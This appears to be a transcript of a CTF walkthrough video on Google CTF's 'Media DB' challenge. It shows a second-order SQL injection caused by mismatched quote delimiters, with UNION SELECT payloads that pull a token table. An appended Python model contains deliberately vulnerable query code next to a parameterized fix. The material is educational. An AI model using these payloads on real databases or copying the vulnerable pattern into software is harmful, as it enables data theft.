Hey everyone, welcome back to the YouTube video. We're still looking at the Google Capture the Flag competition that just finished up a little while ago on the last weekend. Shout out to LiveOverflow, who was willing to take a look at this game with me, and hopefully he'll be releasing some cool stuff very, very soon to cover some of the challenges that he took a look at, and that I kind of took a look at with him. He was a real rockstar on it, so check out his YouTube channel if you haven't already. But let's jump in.

This next challenge I want to cover in the Beginner's Quest is another miscellaneous challenge at the top path, called Media DB. It's a miscellaneous challenge, as I've already said. Looks like there's some custom database stuff. You can read the prompt, but it has a netcat connection, and it also has an attachment, so we might be getting a binary, a script, or a program that we can actually take a look at here.

So let's create a directory for this stuff and work with it: media_db. Let's create a connect script so I can netcat into that real easily, mark that as connect, and let's download this attachment, gctf media db. Cool. It's pretty easy to tell that this is another zip archive. Yep, as expected. Media dot zip, or whatever, call it whatever we want. Let's unzip that and we have media db. Oh, it's a Python script. Okay, cool. Let's see that in Sublime. Bang, here we go: Python 2.7, you can tell from the shebang line. Importing sqlite. Okay, so we've got a database here, and that banner looks like it allows us to add a song, play the artist, playlist, etc., etc. Let's interact with the program. For one thing, let's actually do this connect thing. I guess I don't know why I did that, because now I actually do want to know what these functions do. Let's read the source code. Opening the oauth token file as a file descriptor, flag equals... okay.
So flag is the contents of this oauth token file. Okay, the connection: the database is running in memory, needs whatever. Okay, and the oauth tokens table is what has the flag. So that table, oauth_tokens, has the flag for us, and we have media, which actually has artist and song. And we have a function that will print stuff out for us; we have functions to print out a playlist. Okay, it prints out the banner, it sends that along, and then there's a big loop that gets the banner for us, gets the menu, anyway, reads in our input and then determines what we've entered, the choice. So, okay, if it's anything in that menu... if not, it will obviously tell us no. Like six, okay, eight, blah blah blah. That will determine if we have the correct input, and if one, if we're asking for the artist name, it reads in a song name and it runs a SQL statement here: insert into media, with double quotes. And it's using a format. So Python format is not as bad as concatenating, but it is still putting our arguments in there raw. But that's wrapped in double quotes here. That is inserting into the database, though. That's good to note. Other artists, what is that option? So, add a song, and play from an artist: insert into... select these things. Select uses single quotes here. Okay, that's peculiar. Select from song uses single quotes. Number four: select artist, song from media where artist is this, single quotes. Huh, and that's all. Okay, otherwise it's bye. So that's peculiar, because we're inserting where we have double quotes as our barrier, but we're selecting where we have single quotes as our barrier.
So we could mess around with that, because we could just use double quotes or single quotes to break out of that, but it looks like they're doing a good job of replacing those characters, like these lines here: artist replace, or song replace, etc., etc. Hmm. But because of that discrepancy, where we have double quotes on one side and single quotes on the other, we can insert into the database with single quotes breaking out, and we can have SQL injection just like that. Let's try, let's give that a go. Let's kill Sublime Text now that we have an idea and an attack vector. Let's connect and add a song: artist name john, whatever, just to see the proof of concept. Okay. Yeah, we can add stuff to the database. So let's add artist name john, and then... oh, artist is where they're actually... if I were to shuffle songs, artist is what they're actually querying for. So the song name can be subscribe, how about that? Whatever. For wins, etc., etc. Add song. Let's do john, single quote, union select one, two, because what were they selecting? Song and artist, right? So let's have a comment there, and anything for the song name. Now if I were to run this... oh, looks like we get two by one. Looks like our union select worked. So now that we know that works for us, let's try and add a song where we can do john, single quote, union select oauth_token from oauth_tokens, and then two, comment, because oauth_token had the flag; the oauth_tokens table is where that was stored. So the song name can be lol subscribe again, because SQL injection, super cool. Let's shuffle the artist, and just like that we get our flag.
So neat. Let's steal that. I think it's a pretty interesting catch, checking out the quotes that it's using, and we can get around that since that was the discrepancy between a double quote and a single quote. If you wanted to, you could write a get-flag script for this. I'm not going to go through that process, but since we're connecting with the service, I would use pwntools, send it that exploit, quote unquote, or send it that technique, or that bug, take advantage of that vulnerability, and, I don't know, print out just your flag. Sweet. Let's mark this as complete, and we're done with the Media DB challenge. Thank you guys for watching. Hope you're enjoying these videos. Check out LiveOverflow if you haven't already; hopefully we can do more content together again soon, or at least still be interacting, still talking, because he's an awesome YouTuber, and I'm really happy to be getting together with him. Hey, if you liked this video, please press that like button. If you'd like to maybe leave me a comment, let me know what you think, what else you'd like to see, what I can do better with, please do. If you're willing to subscribe, I'm grateful for it. So see you soon.
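As an added example (not the challenge's script and not the author's code), here is a small Python 3 model of the bug described in the video: the insert is delimited with double quotes and strips only the double-quote character, while the shuffle re-queries each stored artist with a single-quoted SELECT, so a single quote smuggled in through the insert fires later in the select (a second-order injection). The table and column names (`media(artist, song)`, `oauth_tokens(oauth_token)`), the flag value and the exact filtering logic are assumptions chosen to match the writeup, and the hardened variant with parameterized queries is ours, not the challenge's.

```python
"""Model of the quote-mismatch SQL injection from the Media DB writeup.

Added example, not the challenge's source. Table/column names, the flag value
and the filtering are assumptions; the challenge itself was Python 2.7, this
runs on Python 3 with the standard-library sqlite3 module.
"""
import sqlite3

FLAG = "CTF{constructed-sample-flag}"  # constructed sample value, not the real flag


def build_db():
    """Fresh in-memory database with the two tables the writeup mentions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE oauth_tokens (oauth_token TEXT)")
    conn.execute("CREATE TABLE media (artist TEXT, song TEXT)")
    conn.execute("INSERT INTO oauth_tokens VALUES (?)", (FLAG,))
    return conn


# --- vulnerable pattern: only the quote the INSERT uses is filtered ----------
def add_song_vuln(conn, artist, song):
    # The INSERT is delimited with double quotes, so only '"' is stripped;
    # a single quote survives into the stored artist name.
    artist = artist.replace('"', "")
    song = song.replace('"', "")
    conn.execute('INSERT INTO media VALUES ("{}", "{}")'.format(artist, song))


def shuffle_vuln(conn):
    """Re-query every stored artist with a SINGLE-quoted SELECT.

    The stored artist string is formatted straight into the query, so the
    single quote that the INSERT let through now terminates the literal.
    """
    out = []
    for (artist,) in conn.execute("SELECT DISTINCT artist FROM media"):
        q = "SELECT artist, song FROM media WHERE artist = '{}'".format(artist)
        for a, s in conn.execute(q):
            out.append("{} by {}".format(s, a))  # "song by artist"
    return out


# --- hardened pattern: bind parameters on both the INSERT and the SELECT -----
def add_song_safe(conn, artist, song):
    conn.execute("INSERT INTO media VALUES (?, ?)", (artist, song))


def shuffle_safe(conn):
    out = []
    for (artist,) in conn.execute("SELECT DISTINCT artist FROM media"):
        rows = conn.execute(
            "SELECT artist, song FROM media WHERE artist = ?", (artist,))
        for a, s in rows:
            out.append("{} by {}".format(s, a))
    return out


# Payloads from the writeup: a probe that proves the UNION lines up with the
# two selected columns, then the real read of the token table.
PROBE = "john' UNION SELECT 1, 2--"
PAYLOAD = "john' UNION SELECT oauth_token, 2 FROM oauth_tokens--"


def run(artist_payload, vulnerable=True):
    """Add one song with the given artist name, then shuffle; return the lines."""
    conn = build_db()
    add = add_song_vuln if vulnerable else add_song_safe
    shuffle = shuffle_vuln if vulnerable else shuffle_safe
    add(conn, artist_payload, "subscribe")
    return shuffle(conn)


if __name__ == "__main__":
    print(run(PROBE))                       # ['2 by 1']
    print(run(PAYLOAD))                     # ['2 by CTF{...}']  token leaked
    print(run(PAYLOAD, vulnerable=False))   # payload is just an odd artist name
```

The check that matters when reviewing code like this: a `replace` on one quote character is not escaping, and it only protects the statement whose delimiter it strips. Any later statement that uses a different delimiter, or the same data formatted into a query with `.format`, `%` or concatenation, is still injectable. Binding parameters (`?` placeholders with a tuple) on every statement removes the problem regardless of which quote characters the data contains.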